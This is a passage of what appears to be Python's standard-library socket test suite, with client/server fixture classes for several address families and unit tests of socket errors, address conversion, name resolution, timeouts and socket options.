ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen(1)
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
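# A minimal sketch of the combination described in the comment above
# SocketTestBase: mixing ConnectedStreamTestMixin with TCPTestBase yields a
# SocketConnectedTest-style fixture for that address family. The class below
# is illustrative only and defines no test methods of its own, so it adds
# nothing to the suite.
class _ExampleConnectedTCPTest(ConnectedStreamTestMixin, TCPTestBase):
    pass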
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
# Don't use "localhost" here - it may not have an IPv6 address
# assigned to it by default (e.g. in /etc/hosts), and if someone
# has assigned it an IPv4-mapped address, then it's unlikely to
# work with the full IPv6 API.
host = "::1"
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except socket.error as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
self.assertTrue(repr(s).startswith("<socket.socket object"))
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(socket.error, msg=msg % 'socket.error'):
raise socket.error
with self.assertRaises(socket.error, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(socket.error, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
        # Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"'str' does not support the buffer interface")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"'complex' does not support the buffer interface")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"'str' does not support the buffer interface")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"'complex' does not support the buffer interface")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except socket.error:
# Probably name lookup wasn't set up right; skip this test
return
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except socket.error:
# Probably a similar problem as above; skip this test
return
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except socket.error as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(socket.error, socket.if_indextoname, 0)
self.assertRaises(socket.error, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
if hasattr(sys, "getrefcount"):
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except socket.error:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
good_values = [ 1, 2, 3, 1, 2, 3 ]
bad_values = [ -1, -2, -3, -1, -2, -3 ]
for k in good_values:
socket.ntohl(k)
socket.ntohs(k)
socket.htonl(k)
socket.htons(k)
for k in bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htonl, k)
self.assertRaises(OverflowError, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except socket.error:
pass
else:
raise socket.error
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except socket.error:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
def testIPv4_inet_aton_fourbytes(self):
if not hasattr(socket, 'inet_aton'):
return # No inet_aton, nothing to check
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
def testIPv4toString(self):
if not hasattr(socket, 'inet_pton'):
return # No inet_pton() on this platform
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(socket.error, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
def testIPv6toString(self):
if not hasattr(socket, 'inet_pton'):
return # No inet_pton() on this platform
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
return
except ImportError:
return
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(socket.error, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
def testStringToIPv4(self):
if not hasattr(socket, 'inet_ntop'):
return # No inet_ntop() on this platform
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(socket.error, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
def testStringToIPv6(self):
if not hasattr(socket, 'inet_ntop'):
return # No inet_ntop() on this platform
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
return
except ImportError:
return
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(socket.error, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
        # it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except socket.error:
# Probably name lookup wasn't set up right; skip this test
return
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
        # A newly created socket should start with SO_REUSEADDR disabled (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(socket.error, sock.send, b"spam")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
host = '0.0.0.0'
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
sock = socket.socket()
try:
self.assertRaises(OverflowError, sock.bind, (host, big_port))
self.assertRaises(OverflowError, sock.bind, (host, neg_port))
sock.bind((host, port))
finally:
sock.close()
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, None, socket.AF_INET)
for family, _, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269
if hasattr(socket, 'AI_NUMERICSERV'):
socket.getaddrinfo("localhost", None, 0, 0, 0, socket.AI_NUMERICSERV)
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(socket.error, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test (issue #12804).
try:
socket.gethostbyname('python.org')
except socket.gaierror as e:
if e.errno == socket.EAI_NODATA:
self.skipTest('internet access required for this test')
# these should all be successful
socket.gethostbyname('испытание.python.org')
socket.gethostbyname_ex('испытание.python.org')
socket.getaddrinfo('испытание.python.org',0,socket.AF_UNSPEC,socket.SOCK_STREAM)
        # this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
        # socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
def test_listen_backlog(self):
for backlog in 0, -1:
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
srv.listen(backlog)
srv.close()
# Issue 15989
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
('::1',0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, ('::1', 0, -10))
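# A hedged note on the AF_INET6 address tuples exercised by test_flowinfo()
# above: the optional third and fourth items are flowinfo and scope_id, and
# CPython appears to limit flowinfo to the 20-bit IPv6 flow label range
# (0..0xfffff), which is why the out-of-range values above raise
# OverflowError.  The helper below is a hypothetical illustration and is
# never called by the test runner.
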